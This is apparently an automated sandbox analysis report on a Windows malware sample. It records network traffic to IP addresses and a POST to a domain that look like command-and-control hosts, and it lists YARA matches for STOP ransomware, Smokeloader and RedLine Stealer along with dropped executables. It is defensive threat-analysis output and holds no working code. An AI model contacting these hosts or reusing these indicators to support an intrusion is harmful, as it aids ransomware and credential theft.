                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 45 c0 5f 80 0d 80 b8 56 f0 67 a5 7c 0a 5f 78 a1 28 01 7c 89 Data Ascii: Uys/~(`:E_Vg|_x(|
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 11 Aug 2022 04:53:54 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4b c7 5f 83 04 86 b8 54 f2 67 a0 7d 1d 16 39 f5 71 02 6d 80 5d 67 0e 61 d4 Data Ascii: Uys/~(`:K_Tg}9qm]ga
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 1d 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 94 4a ed e5 8d d5 fb 8c 21 85 00 40 fd 16 dc 83 6c bd e9 a3 1e 28 31 8a ff 09 65 00 4a e6 da 43 ce d2 9e 34 65 ce be 34 e6 43 53 4d 4a e4 b8 8e 63 89 53 0e 00 b7 d4 58 28 2e 10 ad de 6f 32 33 1a 8d bb d6 96 27 a4 25 0f 3a b8 2a de 84 f0 a0 82 ae 90 c0 1d f3 b1 3a 5c e4 74 4e 1f f0 e2 2a cc ad 78 4b 5c ee 22 70 71 d7 21 7d dc d6 ba 23 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 28 c8 55 db 88 0c 16 13 27 e8 12 f0 24 08 4f c5 03 a1 cb a1 81 7e dc f4 62 b8 17 37 7e 75 ab 9a a5 20 c8 a0 c1 b9 dd 7a fd a3 4e 19 e0 3c 95 a9 18 5a f1 96 be 25 11 61 9a c4 3e 7c 88 2a c8 48 6d a1 c0 4a 9a 03 fd ec 98 aa 7b ac 87 2f bd 61 0d 10 58 bf 46 30 fd f8 12 6c 33 6c 2b 7c 4a 0c c7 fd f4 0e a4 fb 7e 71 eb 80 e5 1a 68 8b 4a d8 19 ae cc 4f 2b 79 82 ae 9c 97 02 4c 75 56 ad f3 d7 e2 2e b9 5a ee cc 23 b2 e5 0b 31 99 93 90 f7 df f5 ec e7 72 2b 4c 80 d0 92 fc 13 93 38 bb d6 af 91 39 27 04 4d b7 9f c3 0b c8 46 8d 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 18 46 46 40 37 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 70 16 51 c8 71 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 1c 5c 82 23 6a 54 ab 1e a0 55 15 ee c3 de 57 a3 4c 37 81 1f d4 58 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 86 7d 10 ff 3e cb bd d1 ed 66 99 8a 15 44 7f 74 79 10 69 43 cc 1b 8b 8b e1 4c 7e d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 5f fe c5 cb 0e ee f6 6b e3 ad 49 d9 37 00 70 e7 1c c9 a8 f5 52 48 14 3e 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 43 eb ac 58 58 1c 7c b8 e1 cf 25 2e 7f 97 ce ec 35 08 c6 a7 0d aa ca d4 5f 71 46 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 73 0b 0f bf c5 ac 8b c8 2f 1b c6 09 e8 8b 83 1b ac 18 9e 77 b3 0e c9 84 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 53 e8 b8 0e 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.138.74.104
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynbbrbceap.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: linislominyt11.at
                    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49804 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49814 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49815 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49816 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49822 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: Yara matchFile source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.278637701.0000000002651000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.294702276.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.343191676.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.343211043.0000000004111000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: 33.exe, 00000028.00000002.487799744.000000000149A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: Yara matchFile source: 28.0.A658.exe.400000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.0.A658.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.A658.exe.23415a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.0.A658.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.A658.exe.23415a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.0.A658.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.0.A658.exe.400000.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.0.A658.exe.400000.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.0.A658.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.A658.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.0.A658.exe.400000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.A658.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.0.A658.exe.400000.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.0.A658.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.0.A658.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.0.A658.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: A658.exe PID: 5244, type: MEMORYSTR

                    System Summary

                    barindex
                    Source: 28.0.A658.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.0.A658.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.0.A658.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.0.A658.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.0.A658.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 27.2.A658.exe.23415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 27.2.A658.exe.23415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.0.A658.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.0.A658.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 27.2.A658.exe.23415a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 27.2.A658.exe.23415a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.0.A658.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.0.A658.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.0.A658.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.0.A658.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.0.A658.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.0.A658.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.0.A658.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.0.A658.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.2.A658.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.2.A658.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.0.A658.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.0.A658.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.2.A658.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.2.A658.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.0.A658.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.0.A658.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.0.A658.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.0.A658.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.0.A658.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.0.A658.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 28.0.A658.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 28.0.A658.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 00000011.00000002.343161421.00000000040E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000000.00000002.294980929.00000000026E7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 00000014.00000002.419481551.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 0000001B.00000002.457366920.000000000066D000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000004.00000000.278637701.0000000002651000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 00000011.00000002.342997867.0000000002546000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.294639140.0000000002680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000014.00000002.418304961.0000000000499000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.294702276.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 0000001C.00000000.445516045.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 00000011.00000002.343191676.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 00000011.00000002.343211043.0000000004111000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                    Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                    Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: Process Memory Space: A658.exe PID: 5244, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00410450
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00413410
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_0040FE27
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_00410EF2
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeCode function: 0_2_004109A1
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00410450
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00413410
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_0040FE27
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_00410EF2
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_004109A1
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0042603E
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0042A130
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00423F60
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0042AF10
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_0234CA10
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_02350B00
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_0234DBE0
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_0234B000
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_0234B0B0
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_023430EE
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_023500D0
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_023618D0
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_0236F9B0
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_0236E9A3
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_0234E6E0
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_0234C760
                    Source: 5tLwjRFzAW.exeStatic PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
                    Source: 5tLwjRFzAW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 5tLwjRFzAW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 5tLwjRFzAW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 5tLwjRFzAW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 5tLwjRFzAW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 5tLwjRFzAW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: D0E3.dll.4.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: E69F.exe.4.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: A658.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 28E9.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 28E9.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 28E9.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 28E9.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: irbiwat.4.drStatic PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
                    Source: irbiwat.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: irbiwat.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
